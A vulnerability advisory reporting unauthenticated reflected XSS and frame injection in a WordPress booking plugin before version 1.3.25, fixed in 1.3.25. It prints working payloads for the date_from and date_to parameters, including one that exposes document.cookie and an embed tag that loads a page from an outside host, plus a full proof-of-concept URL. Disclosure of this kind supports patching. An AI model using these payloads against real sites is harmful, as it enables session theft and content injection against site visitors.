BA Book Everything < 1.3.25 - Unauthenticated Reflected XSS & XFS
Description
An Unauthenticated Reflected XSS & XFS vulnerabilities was discovered in the BA Book Everything plugin v1.3.24 for WordPress. Vulnerable parameter(s): date_from, date_to.
Proof of Concept
[$] :: Payloads: "><!--<img src="--><img src=x onerror=(alert)(`Ex.Mi`);(alert)(document.cookie);//"> "><embed src=//ex-mi.ru/payload/xfsii.html></embed> [!] :: PoC: https://ba-booking.com/ba-book-everything/search-result/?date_from=%22%3E%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`Ex.Mi`);(alert)(document.cookie);//%22%3E&date_to=%22%3E%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`Ex.Mi`);(alert)(document.domain);//%22%3E
Affects Plugins
Fixed in version 1.3.25✓
References
Classification
Miscellaneous
Original Researcher
Ex.Mi
Submitter
Ex.Mi
Submitter website
Verified
Yes
Timeline
Publicly Published
2020-11-12 (about 11 months ago)
Added
2020-11-12 (about 11 months ago)
Last Updated
2020-11-14 (about 11 months ago)